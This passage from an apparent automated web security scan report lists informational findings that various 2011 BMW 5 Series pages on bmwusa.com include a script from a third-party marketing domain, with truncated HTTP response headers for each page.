X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:12 GMT;path=/
Content-Length: 213528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.126. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/5seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535isedan/5seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:44:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:04:11 GMT;path=/
Content-Length: 202023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.127. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:43:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:03:33 GMT;path=/
Content-Length: 214435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.128. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535isedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:44:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:04:24 GMT;path=/
Content-Length: 227015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.129. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:43:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:03:51 GMT;path=/
Content-Length: 215504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.130. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:58:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:24 GMT;path=/
Content-Length: 202297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.131. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:36 GMT;path=/
Content-Length: 202298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.132. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:56:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:16:14 GMT;path=/
Content-Length: 215086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.133. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:07 GMT;path=/
Content-Length: 215087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.134. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:56:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:16:01 GMT;path=/
Content-Length: 229148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.135. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:20 GMT;path=/
Content-Length: 215501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.136. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:12 GMT;path=/
Content-Length: 215502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.137. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/5seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivesedan/5seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:22 GMT;path=/
Content-Length: 201982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.138. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:00 GMT;path=/
Content-Length: 214938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.139. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivesedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:32 GMT;path=/
Content-Length: 227353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.140. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivesedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:18 GMT;path=/
Content-Length: 216385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.141. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/5seriesgranturismomediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550igt/5seriesgranturismomediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:59:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:19:51 GMT;path=/
Content-Length: 202083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.142. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550igt/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:58:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:40 GMT;path=/
Content-Length: 213862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.143. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:00:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:20:22 GMT;path=/
Content-Length: 228676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.144. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:00:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:20:14 GMT;path=/
Content-Length: 228677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.145. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:59:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:19:35 GMT;path=/
Content-Length: 214337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.146. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:58:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:59 GMT;path=/
Content-Length: 214338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.147. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/5seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550isedan/5seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:53 GMT;path=/
Content-Length: 202023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.148. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:22 GMT;path=/
Content-Length: 214373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.149. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550isedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:58 GMT;path=/
Content-Length: 227791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.150. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:36 GMT;path=/
Content-Length: 215373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.151. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
